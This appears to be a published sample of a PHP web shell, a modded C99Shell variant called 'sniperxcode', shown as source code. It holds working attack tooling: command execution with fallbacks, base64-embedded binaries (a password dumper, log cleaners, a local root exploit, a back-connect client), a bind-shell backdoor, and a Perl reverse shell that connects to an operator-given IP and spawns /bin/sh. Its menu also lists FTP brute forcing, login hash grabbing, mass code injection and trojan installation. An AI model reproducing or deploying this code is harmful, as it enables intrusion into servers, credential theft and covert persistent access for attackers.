A PHP/Backdoor drops C99Shell Sophisticated Variant!

1. ＜?php
2.  
3. /******************************************************************************************
4. * sniperxcode, a modded sniperxcode, which is a: $count＝0; while（$count＝＝0）{ echo ' mod of a'; }
5. *
6. * VERSION 2 BITCH!!!!
7. *
8. * By ssniperxcode - the 11-year-old hacker :）
9. *
10. * Greetz to all my friends in #lobby
11. *
12. * A big, fat "fuck you" to:
13. * - HellBound Hackers （you're also part of the next on the list, except you can't even deface!）
14. * - people who deface because they can't root and think they're 1337
15. * - idiots who add mail（） to their shells so they can log your ownages
16. * - idiots who add mail（） to their shells so they can log your ownages and mess up the variables so it doesn't even work!
17. * - MPAA, RIAA, and all those other arse-hole anti-p2p organizations
18. *
19. * lack of money and parental freedom leaves me with no site to advertise xD
20. *
21. *
22. * Newer Mods （added by me） for v2 --
23. +--------------------------------------------------------+
24. * fixed a bug where deleting something from a path that has a space in it would return you to an invalid dir
25. * fixed the *nix aliases where the cmds were in the name and the names were executed :S
26. * added md5/sha1 file checksums
27. * removed fgdump （no need for three programs that do the same f-ing thing :P） !!! 1 mb saved !!!
28. *
29. *
30. * Old Mods （added by me） for v1 --
31. +--------------------------------------------------------+
32. * added the trojan executer
33. * cleaned up the interface in general
34. * added windows login hash grabber + sam/fg/pwdump2
35. * added mass code injector （thanks SubSyn）
36. * added pre-compiled h00lyshit and raptor_chown
37. * added log cleaners for both *nix and windows
38. * removed all the shitty/non-working functions in the drop-down boxes
39. * fixed the google kernel thing （the search variables were fuxxed up）
40. * made the dir listing easier to read with the alternating bgcolors
41. * little optimizations in code here and there （i'm an optimization whore tbh）
42. * submit md5/sha1 hash to cracking sites
43. * made that awesome logo ;）
44. * added the disabled php functions thing （took from r57shell）
45. * added better windows/*nix-specific aliases
46. * cleaned up the safe-mode bypass functions （wow, some of the shittiest code i've ever seen o_O ）
47. * wordlist md5/sha1 cracker
48. *
49. * What I Plan to Do Next --
50. +--------------------------------------------------------+
51. * smaller size （somehow） :S
52. * more sploits
53. * allow input for dir to unpack exploits to
54. * better trojans/backdoors
55. * more functions/aliases
56. * maybe move stuff around/change theme
57. * make the php picture in the dir listing white for easier readability
58. * take a first look at the sql section o.O
59. * remove:
60. * - more of those stupid spaces after every line
61. * - more " and change them to ' for faster execution
62. * - a bunch of other stupid code things （example: echo（"$msg"）; （wtf... :S））
63. *********************************************************/
64.  
65. //milw0rm search
66. $Lversion ＝ php_uname（r）;
67. $OSV ＝ php_uname（s）;
68. if（eregi（'Linux',$OSV））
69. {
70. $Lversion＝substr（$Lversion,0,6）;
71. $millink＝"http://milw0rm.com/search.php?dong＝Linux Kernel ".$Lversion;
72. }else{
73. $Lversion＝substr（$Lversion,0,3）;
74. $millink＝"http://milw0rm.com/search.php?dong＝".$OSV." ".$Lversion;
75. }
76. //End of milw0rm search
77.  
78.  
79. //w4ck1ng Shell
80. if （!function_exists（'myshellexec'））
81. {
82. if（is_callable（"popen"））{
83. function myshellexec（$command） {
84. if （!（$p＝popen（"（$command）2＞&1","r"））） {
85. return 126;
86. }
87. while （!feof（$p）） {
88. $line＝fgets（$p,1000）;
89. $out .＝ $line;
90. }
91. pclose（$p）;
92. return $out;
93. }
94. }else{
95. function myshellexec（$cmd）
96. {
97. global $disablefunc;
98. $result ＝ '';
99. if （!empty（$cmd））
100. {
101. if （is_callable（'exec'） and !in_array（'exec',$disablefunc）） {exec（$cmd,$result）; $result ＝ join（"\n",$result）;}
102. elseif （（$result ＝ `$cmd`） !＝＝ FALSE） {}
103. elseif （is_callable（"system"） and !in_array（"system",$disablefunc）） {$v ＝ @ob_get_contents（）; @ob_clean（）; system（$cmd）; $result ＝ @ob_get_contents（）; @ob_clean（）; echo $v;}
104. elseif （is_callable（"passthru"） and !in_array（"passthru",$disablefunc）） {$v ＝ @ob_get_contents（）; @ob_clean（）; passthru（$cmd）; $result ＝ @ob_get_contents（）; @ob_clean（）; echo $v;}
105. elseif （is_resource（$fp ＝ popen（$cmd,"r"）））
106. {
107. $result ＝ '';
108. while（!feof（$fp）） {$result .＝ fread（$fp,1024）;}
109. pclose（$fp）;
110. }
111. }
112. return $result;
113. }
114. }
115.  
116. // Password dumping!!!!↓↓
117. }
118.  
119. $pwdump2＝"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
120. AAAA0AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
121. ZGUuDQ0KJAAAAAAAAABe6Dg9GolWbhqJVm4aiVZu8pZdbhuJVm6ZlVhuF4lWbkOqRW4fiVZuGolX
122. biGJVm7lqVxuG4lWbvKWXG4qiVZuUmljaBqJVm4AAAAAAAAAAFBFAABMAQMA7bzbOAAAAAAAAAAA
123. 4AAPAQsBBgAAUAAAAEAAAAAAAABHHAAAABAAAABgAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAA
124. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
125. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
126. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
127. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
128. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
129. AA＝＝";
130.  
131.  
132. // Hack hack the c libs in ur box...
133.  
134. $miglc＝"f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAIIgECDQAAAA0XAAAAAAAADQAIAAGACgAHgAbAAYAAAA0
135. AAAANIAECDSABAjAAAAAwAAAAAUAAAAEAAAAAwAAAPQAAAD0gAQI9IAECBMAAAATAAAABAAAAAEA
136. AAABAAAAAAAAAACABAgAgAQI4DYAAOA2AAAFAAAAABAAAAEAAADgNgAA4MYECODGBAh0AQAAmAEA
137. :
138. :
139. :
140. cmF5X3N0YXJ0AF9JT19zdGRpbl91c2VkAGtpbGxfd3RtcABfX2RhdGFfc3RhcnQAX0p2X1JlZ2lz
141. dGVyQ2xhc3NlcwBfX3ByZWluaXRfYXJyYXlfc3RhcnQAcmVhZEBAR0xJQkNfMi4wAGtpbGxfbGFz
142. dGxvZwBfX2dtb25fc3RhcnRfXwA＝";
143.  
144. $blackhole＝"f0VMRgEBAQkAAAAAAAAAAAIAAwABAAAARIYECDQAAACgDQAAAAAAADQAIAAGACgAGAAVAAYAAAA0
145. AAAANIAECDSABAjAAAAAwAAAAAUAAAAEAAAAAwAAAPQAAAD0gAQI9IAECBkAAAAZAAAABAAAAAEA
146. AAABAAAAAAAAAACABAgAgAQIAAsAAAALAAAFAAAAABAAAAEAAAAACwAAAJsECACbBAgEAQAAIAEA
147. :
148. :
149.  
150. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
151. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
152. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
153. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJFRU
154. Wdfb08/q3OiZ0eXTbpynnqlyfKdzc3NiXaFemV+lYJ1tYVdh1OXK1tbYm9vo02Hp8MnR0+SWzNnY
155. ZVtSoFJcTlRPp5avqVzj4NrWosfQ1VBaUFrzrZi+wZ2ooauorLiWqJK8rLazkrimo5mVmJq3rquX
156. tKahmaip8li6s8aGztfv2s7TzFysw7iMwNPh3NrL2FQ＝";
157.  
158. $raptorchown＝"f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIQECDQAAACYCgAAAAAAADQAIAAHACgAGwAYAAYAAAA0
159. AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEA
160. AAABAAAAAAAAAACABAgAgAQIAAgAAAAIAAAFAAAAABAAAAEAAAAACAAAAJgECACYBAggAQAAKAEA
161. :
162. bml0AF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRf
163. YXJyYXlfZW5kAHN0cmNhdEBAR0xJQkNfMi4wAGRhdGFfc3RhcnQAcHJpbnRmQEBHTElCQ18yLjAA
164. X2ZpbmkAbWVtY3B5QEBHTElCQ18yLjAAZXJyb3IAX19wcmVpbml0X2FycmF5X2VuZABfX2V4Y29k
165. ZQBvcGVuQEBHTElCQ18yLjAAZXhpdEBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9U
166. QUJMRV8AX2VuZABnZXRjd2RAQEdMSUJDXzIuMABtZW1zZXRAQEdMSUJDXzIuMABfX2V4Y29kZV9l
167. AF9faW5pdF9hcnJheV9zdGFydABfX2ZzdGF0AF9JT19zdGRpbl91c2VkAG1hZHZpc2VAQEdMSUJD
168. XzIuMABzcHJpbnRmQEBHTElCQ18yLjAAX19kYXRhX3N0YXJ0AF9Kdl9SZWdpc3RlckNsYXNzZXMA
169. ZXhwbG9pdABfX3ByZWluaXRfYXJyYXlfc3RhcnQAX19nbW9uX3N0YXJ0X18A";
170.  
171.  
172. // BACKDOOORZZ!!! LULZ!!! yeah.
173.  
174.  
175. $back_connect_c＝"f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAA2IUECDQAAABMDAAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQILAkAACwJAAAFAAAAABAAAAEAAAAsCQAALJkECCyZBAg4AQAAPAEAAAYAAAAAEAAAAgAAAEAJAABAmQQIQJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAA
176. :
177. :
178. hcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
179.  
180. function checkproxyhost（）{
181. $host ＝ getenv（"HTTP_HOST"）;
182. $filename ＝ '/tmp/.setan/xh';
183. if （file_exists（$filename）） {
184. $_POST['proxyhostmsg']＝"＜/br＞＜/br＞＜center＞＜font color＝green size＝3＞＜b＞Success!＜/b＞＜/font＞＜/br＞＜/br＞＜a href＝$host:6543＞$host:6543＜/a＞＜/br＞＜/br＞＜b＞Note:＜/b＞ If '$host' have a good firewall or IDS installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.＜/br＞＜/br＞＜/center＞";
185. } else {
186. $_POST['proxyhostmsg']＝"＜/br＞＜/br＞＜center＞＜font color＝red size＝3＞＜b＞Failed!＜/b＞＜/font＞＜/br＞＜/br＞＜b＞Note:＜/b＞ If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.＜/br＞＜/br＞＜/center＞";
187. }
188. }
189.  
190. if （!empty（$_POST['backconnectport']） && （$_POST['use']＝＝"shbd"））
191. {
192. $ip ＝ gethostbyname（$_SERVER["HTTP_HOST"]）;
193. $por ＝ $_POST['backconnectport'];
194. if（is_writable（"."））{
195. cfb（"shbd",$backdoor）;
196. ex（"chmod 777 shbd"）;
197. $cmd ＝ "./shbd $por";
198. exec（"$cmd ＞ /dev/null &"）;
199. $scan ＝ myshellexec（"ps aux"）;
200. if（eregi（"./shbd $por",$scan））{ $data ＝ （"\n＜/br＞＜/br＞Process found running, backdoor setup successfully."）; }elseif（eregi（"./shbd $por",$scan））{ $data ＝ （"\n＜/br＞Process not found running, backdoor not setup successfully."）; }
201. $_POST['backcconnmsg']＝"To connect, use netcat and give it the command ＜b＞'nc $ip $por'＜/b＞.$data";
202. }else{
203. cfb（"/tmp/shbd",$backdoor）;
204. ex（"chmod 777 /tmp/shbd"）;
205. $cmd ＝ "./tmp/shbd $por";
206. exec（"$cmd ＞ /dev/null &"）;
207. $scan ＝ myshellexec（"ps aux"）;
208. if（eregi（"./shbd $por",$scan））{ $data ＝ （"\n＜/br＞＜/br＞Process found running, backdoor setup successfully."）; }elseif（eregi（"./shbd $por",$scan））{ $data ＝ （"\n＜/br＞Process not found running, backdoor not setup successfully."）; }
209. $_POST['backcconnmsg']＝"To connect, use netcat and give it the command ＜b＞'nc $ip $por'＜/b＞.$data";
210. }
211. }
212.  
213. if （!empty（$_POST['backconnectip']） && !empty（$_POST['backconnectport']） && （$_POST['use']＝＝"Perl"））
214. {
215. if（is_writable（"."））{
216. cf（"back",$back_connect）;
217. $p2＝which（"perl"）;
218. $blah ＝ ex（$p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"）;
219. $_POST['backcconnmsg']＝"Trying to connect to ＜b＞".$_POST['backconnectip']."＜/b＞ on port ＜b＞".$_POST['backconnectport']."＜/b＞.";
220. if （file_exists（"back"）） { unlink（"back"）; }
221. }else{
222. cf（"/tmp/back",$back_connect）;
223. $p2＝which（"perl"）;
224. $blah ＝ ex（$p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"）;
225. $_POST['backcconnmsg']＝"Trying to connect to ＜b＞".$_POST['backconnectip']."＜/b＞ on port ＜b＞".$_POST['backconnectport']."＜/b＞.";
226. if （file_exists（"/tmp/back"）） { unlink（"/tmp/back"）; }
227. }
228. }
229.  
230. if （!empty（$_POST['backconnectip']） && !empty（$_POST['backconnectport']） && （$_POST['use']＝＝"C"））
231. {
232. if（is_writable（"."））{
233. cf（"backc",$back_connect_c）;
234. ex（"chmod 777 backc"）;
235. //$blah ＝ ex（"gcc back.c -o backc"）;
236. $blah ＝ ex（"./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"）;
237. $_POST['backcconnmsg']＝"Trying to connect to ＜b＞".$_POST['backconnectip']."＜/b＞ on port ＜b＞".$_POST['backconnectport']."＜/b＞.";
238. //if （file_exists（"back.c"）） { unlink（"back.c"）; }
239. if （file_exists（"backc"）） { unlink（"backc"）; }
240. }else{
241. ex（"chmod 777 /tmp/backc"）;
242. cf（"/tmp/backc",$back_connect_c）;
243. //$blah ＝ ex（"gcc -o /tmp/backc /tmp/back.c"）;
244. $blah ＝ ex（"/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"）;
245. $_POST['backcconnmsg']＝"Trying to connect to ＜b＞".$_POST['backconnectip']."＜/b＞ on port ＜b＞".$_POST['backconnectport']."＜/b＞.";
246. //if （file_exists（"back.c"）） { unlink（"back.c"）; }
247. if （file_exists（"/tmp/backc"）） { unlink（"/tmp/backc"）; } }
248. }
249.  
250. function cf（$fname,$text）
251. {
252. $w_file＝@fopen（$fname,"w"） or err（）;
253. if（$w_file）
254. {
255. @fputs（$w_file,@base64_decode（$text））;
256. @fclose（$w_file）;
257. }
258. }
259.  
260. function cfb（$fname,$text）
261. {
262. $w_file＝@fopen（$fname,"w"） or bberr（）;
263. if（$w_file）
264. {
265. @fputs（$w_file,@base64_decode（$text））;
266. @fclose（$w_file）;
267. }
268. }
269.  
270. function err（）
271. {
272. $_POST['backcconnmsge']＝"＜/br＞＜/br＞＜b＞＜font color＝red size＝3＞Error:＜/font＞ Can't connect!＜/b＞";
273. }
274.  
275. function bberr（）
276. {
277. $_POST['backcconnmsge']＝"＜/br＞＜/br＞＜b＞＜font color＝red size＝3＞Error:＜/font＞ Can't backdoor host!＜/b＞";
278. }
279.  
280. function which（$pr）
281. {
282. $path ＝ ex（"which $pr"）;
283. if（!empty（$path）） { return $path; } else { return $pr; }
284. }
285. function ex（$cfe）
286. {
287. $res ＝ '';
288. if （!empty（$cfe））
289. {
290. if（function_exists（'exec'））
291. {
292. @exec（$cfe,$res）;
293. $res ＝ join（"\n",$res）;
294. }
295. elseif（function_exists（'shell_exec'））
296. {
297. $res ＝ @shell_exec（$cfe）;
298. }
299. elseif（function_exists（'system'））
300. {
301. @ob_start（）;
302. @system（$cfe）;
303. $res ＝ @ob_get_contents（）;
304. @ob_end_clean（）;
305. }
306. elseif（function_exists（'passthru'））
307. {
308. @ob_start（）;
309. @passthru（$cfe）;
310. $res ＝ @ob_get_contents（）;
311. @ob_end_clean（）;
312. }
313. elseif（@is_resource（$f ＝ @popen（$cfe,"r"）））
314. {
315. $res ＝ "";
316. while（!@feof（$f）） { $res .＝ @fread（$f,1024）; }
317. @pclose（$f）;
318. }
319. }
320. return $res;
321. }
322. //EoW
323.  
324.  
325.  
326.  
327.  
328.  
329.  
330.  
331.  
332.  
333.  
334.  
335.  
336.  
337.  
338.  
339. //Start Enumerate function
340. //function ENUMERATE（）
341.  
342. // $hostname_x＝php_uname（n）;
343. // $itshome ＝ getcwd（）;
344. // $itshome ＝ str_replace（"/home/","~",$itshome）;
345. // $itshome ＝ str_replace（"/public_html","/x2300.php",$itshome）;
346. // $enumerate ＝ "http://".$hostname_x."/".$itshome."";
347.  
348. //End Enumerate function
349.  
350. //Starting calls
351. ini_set（"max_execution_time",0）;
352. if （!function_exists（"getmicrotime"）） {function getmicrotime（） {list（$usec, $sec） ＝ explode（" ", microtime（））; return （（float）$usec + （float）$sec）;}}
353. error_reporting（5）;
354. $adires＝"";
355. @ignore_user_abort（TRUE）;
356. @set_magic_quotes_runtime（0）;
357. $win ＝ strtolower（substr（PHP_OS,0,3）） ＝＝ "win";
358. define（"starttime",getmicrotime（））;
359. if （get_magic_quotes_gpc（）） {if （!function_exists（"strips"）） {function strips（&$arr,$k＝""） {if （is_array（$arr）） {foreach（$arr as $k＝＞$v） {if （strtoupper（$k） !＝ "GLOBALS"） {strips（$arr["$k"]）;}}} else {$arr ＝ stripslashes（$arr）;}}} strips（$GLOBALS）;}
360. $_REQUEST ＝ array_merge（$_COOKIE,$_GET,$_POST）;
361. foreach（$_REQUEST as $k＝＞$v） {if （!isset（$$k）） {$$k ＝ $v;}}
362.  
363. $shver ＝ "1.3.37"; //Current version
364. //CONFIGURATION AND SETTINGS
365. if （!empty（$unset_surl）） {setcookie（"c99sh_surl"）; $surl ＝ "";}
366. elseif （!empty（$set_surl）） {$surl ＝ $set_surl; setcookie（"c99sh_surl",$surl）;}
367. else {$surl ＝ $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
368. }
369.  
370. $surl_autofill_include ＝ TRUE; //If TRUE then search variables with descriptors （URLs） and save it in SURL.
371.  
372. if （$surl_autofill_include and !$_REQUEST["c99sh_surl"]） {$include ＝ "&"; foreach （explode（"&",getenv（"QUERY_STRING"）） as $v） {$v ＝ explode（"＝",$v）; $name ＝ urldecode（$v[0]）; $value ＝ urldecode（$v[1]）; foreach （array（"http://","https://","ssl://","ftp://","\\\\"） as $needle） {if （strpos（$value,$needle） ＝＝＝ 0） {$includestr .＝ urlencode（$name）."＝".urlencode（$value）."&";}}} if （$_REQUEST["surl_autofill_include"]） {$includestr .＝ "surl_autofill_include＝1&";}}
373. if （empty（$surl））
374. {
375. $surl ＝ "?".$includestr; //Self url
376. }
377. $surl ＝ htmlspecialchars（$surl）;
378.  
379. $timelimit ＝ 0; //time limit of execution this script over server quote （seconds）, 0 ＝ unlimited.
380.  
381. //Authentication
382. $login ＝ ""; //login
383. //DON'T FORGOT ABOUT PASSWORD!!!
384. $pass ＝ ""; //password
385. $md5_pass ＝ ""; //md5-cryped pass. if null, md5（$pass）
386.  
387. $host_allow ＝ array（"*"）; //array （"{mask}1","{mask}2",...）, {mask} ＝ IP or HOST e.g. array（"192.168.0.*","127.0.0.1"）
388. $login_txt ＝ "Restricted area"; //http-auth message.
389. $accessdeniedmess ＝ "sniperxcode v.".$shver.": access denied";
390.  
391. $gzipencode ＝ TRUE; //Encode with gzip?
392.  
393. $updatenow ＝ FALSE; //If TRUE, update now （this variable will be FALSE）
394.  
395. $c99sh_updateurl ＝ "http://sniperxcode.com/files/lshell_update/"; //Update server
396. $c99sh_sourcesurl ＝ "http://sniperxcode.com/"; //Sources-server
397.  
398. $filestealth ＝ TRUE; //if TRUE, don't change modify- and access-time
399.  
400. $donated_html ＝ "＜center＞＜b＞sniperxcode modded by ssniperxcode＜/b＞＜/center＞";
401. /* If you publish free shell and you wish
402. add link to your site or any other information,
403. put here your html. */
404. $donated_act ＝ array（""）; //array （"act1","act2,"...）, if $act is in this array, display $donated_html.
405.  
406. $curdir ＝ "./"; //start folder
407. //$curdir ＝ getenv（"DOCUMENT_ROOT"）;
408. $tmpdir ＝ ""; //Folder for tempory files. If empty, auto-fill （/tmp or %WINDIR/temp）
409. $tmpdir_log ＝ "./"; //Directory logs of long processes （e.g. brute, scan...）
410.  
411. $log_email ＝ "user@host.tld"; //Default e-mail for sending logs
412.  
413. $sort_default ＝ "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
414. $sort_save ＝ TRUE; //If TRUE then save sorting-position using cookies.
415.  
416. // Registered file-types.
417. // array（
418. // "{action1}"＝＞array（"ext1","ext2","ext3",...）,
419. // "{action2}"＝＞array（"ext4","ext5","ext6",...）,
420. // ...
421. // ）
422. $ftypes ＝ array（
423. 'html'＝＞array（'html','htm','shtml'）,
424. 'txt'＝＞array（'txt','conf','bat','sh','js','bak','doc','log','sfc','cfg','htaccess','passwd','shadow'）,
425. 'exe'＝＞array（'sh','install','bat','cmd'）,
426. 'ini'＝＞array（'ini','inf'）,
427. 'code'＝＞array（'php','phtml','php3','php4','inc','tcl','h','c','cpp','py','cgi','pl'）,
428. 'img'＝＞array（'gif','png','jpeg','jfif','jpg','jpe','bmp','ico','tif','tiff','avi','mpg','mpeg'）,
429. 'sdb'＝＞array（'sdb'）,
430. 'phpsess'＝＞array（'sess'）,
431. 'download'＝＞array（'exe','com','pif','src','lnk','zip','rar','gz','tar'）
432. ）;
433.  
434. // Registered executable file-types.
435. // array（
436. // string "command{i}"＝＞array（"ext1","ext2","ext3",...）,
437. // ...
438. // ）
439. // {command}: %f% ＝ filename
440. $dizin ＝ str_replace（"\\",DIRECTORY_SEPARATOR,$dizin）;
441. if （empty（$dizin）） {$dizin ＝ realpath（"."）;} elseif（realpath（$dizin）） {$dizin ＝ realpath（$dizin）;}
442. $dizin ＝ str_replace（"\\",DIRECTORY_SEPARATOR,$dizin）;
443. if （substr（$dizin,-1） !＝ DIRECTORY_SEPARATOR） {$dizin .＝ DIRECTORY_SEPARATOR;}
444. $dizin ＝ str_replace（"\\\\","\\",$dizin）;
445. $dizinispd ＝ htmlspecialchars（$dizin）;
446. /*dizin*/
447. $real ＝ realpath（$dizinispd）;
448. $path ＝ basename （$PHP_SELF）;
449. function dosyayicek（$link,$file）
450. {
451. $fp ＝ @fopen（$link,'r'）;
452. while（!feof（$fp））
453. {
454. $cont.＝ fread（$fp,1024）;
455. }
456. fclose（$fp）;
457.  
458. $fp2 ＝ @fopen（$file,"w"）;
459. fwrite（$fp2,$cont）;
460. fclose（$fp2）;
461. }
462.  
463.  
464.  
465.  
466. $exeftypes ＝ array（
467. getenv（"PHPRC"）." -q %f%" ＝＞ array（"php","php3","php4"）,
468. "perl %f%" ＝＞ array（"pl","cgi"）
469. ）;
470.  
471. /* Highlighted files.
472. array（
473. i＝＞array（{regexp},{type},{opentag},{closetag},{break}）
474. ...
475. ）
476. string {regexp} - regular exp.
477. int {type}:
478. 0 - files and folders （as default）,
479. 1 - files only, 2 - folders only
480. string {opentag} - open html-tag, e.g. "＜b＞" （default）
481. string {closetag} - close html-tag, e.g. "＜/b＞" （default）
482. bool {break} - if TRUE and found match then break
483. */
484. $regxp_highlight ＝ array（
485. array（basename（$_SERVER["PHP_SELF"]）,1,'＜font color＝red＞','＜/font＞'）, // example
486. array（"config.php",1）, // example
487. array（"settings.php",1）,
488. array（"connect.php",1）
489. ）;
490.  
491. $safemode_diskettes ＝ array（"a"）; // This variable for disabling diskett-errors.
492. // array （i＝＞{letter} ...）; string {letter} - letter of a drive
493. //$safemode_diskettes ＝ range（'a','z'）;
494. $hexdump_lines ＝ 8;// lines in hex preview file
495. $hexdump_rows ＝ 24;// 16, 24 or 32 bytes in one line
496.  
497. $nixpwdperpage ＝ 100; // Get first N lines from /etc/passwd
498.  
499. $bindport_pass ＝ 'c99'; // default password for binding
500. $bindport_port ＝ '31373'; // default port for binding
501. $bc_port ＝ '5992'; // default port for back-connect
502. $datapipe_localport ＝ '8081'; // default port for datapipe
503. $back_connect＝"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
504. aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
505. hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
506. sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
507. kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
508. KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
509. OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw＝＝";
510.  
511. $sess_cookie ＝ "c99shvars"; // Cookie-variable name
512.  
513. $usefsbuff ＝ TRUE; //Buffer-function
514. $copy_unset ＝ FALSE; //Remove copied files from buffer after pasting
515.  
516. //Quick launch
517. $quicklaunch ＝ array（
518. array（"＜img src＝\"".$surl."act＝img&img＝home\" alt＝\"Home\" height＝\"20\" width＝\"20\" border＝\"0\"＞",$surl）,
519. array（"＜img src＝\"".$surl."act＝img&img＝back\" alt＝\"Back\" height＝\"20\" width＝\"20\" border＝\"0\"＞","#\" onclick＝\"history.back（1）"）,
520. array（"＜img src＝\"".$surl."act＝img&img＝forward\" alt＝\"Forward\" height＝\"20\" width＝\"20\" border＝\"0\"＞","#\" onclick＝\"history.go（1）"）,
521. array（"＜img src＝\"".$surl."act＝img&img＝up\" alt＝\"UPDIR\" height＝\"20\" width＝\"20\" border＝\"0\"＞",$surl."act＝ls&d＝%upd&sort＝%sort"）,
522. array（"＜img src＝\"".$surl."act＝img&img＝refresh\" alt＝\"Refresh\" height＝\"20\" width＝\"17\" border＝\"0\"＞",""）,
523. array（"＜img src＝\"".$surl."act＝img&img＝search\" alt＝\"Search\" height＝\"20\" width＝\"20\" border＝\"0\"＞",$surl."act＝search&d＝%d"）,
524. array（"＜img src＝\"".$surl."act＝img&img＝buffer\" alt＝\"Buffer\" height＝\"20\" width＝\"20\" border＝\"0\"＞",$surl."act＝fsbuff&d＝%d"）,
525. array（"＜br＞＜br＞＜center＞＜b＞[String/Hash Tools]＜/b＞",$surl."act＝encoder&d＝%d"）,
526. array（"＜b＞[Tools]＜/b＞",$surl."act＝tools&d＝%d"）,
527. array（"＜b＞[Processes]＜/b＞",$surl."act＝processes&d＝%d"）,
528. array（"＜b＞[FTP Brute Force]＜/b＞",$surl."act＝ftpquickbrute&d＝%d"）,
529. array（"＜b＞[System Information]＜/b＞",$surl."act＝security&d＝%d"）,
530. array（"＜b＞[SQL Shell]＜/b＞",$surl."act＝sql&d＝%d"）,
531. array（"＜b＞[Kernel Exploit Search]＜/b＞",$millink）,
532. array（"＜b＞[Execute PHP Code]＜/b＞",$surl."act＝eval&d＝%d"）,
533. array（"＜b＞[PHP Info]＜/b＞＜/center＞",$surl."act＝phpinfo&d＝%d"）
534. ）;
535. $quicklaunch2 ＝ array（
536. array（"＜b＞＜center＞[Install Trojan/Backdoor]＜/b＞",$surl.'act＝trojan'）,
537. array（"＜b＞[Bind Shell Backdoor]＜/b＞",$surl.'act＝shbd'）,
538. array（"＜b＞[Back-Connection]＜/b＞",$surl.'act＝backc'）,
539. array（"＜b＞[Mass Code Injection]＜/b＞",$surl.'act＝massbrowsersploit'）,
540. array（"＜b＞[Exploits]＜/b＞",$surl.'act＝exploits'）,
541. array（"＜b＞[Grab Login Hashes]＜/b＞",$surl.'act＝grablogins'）,
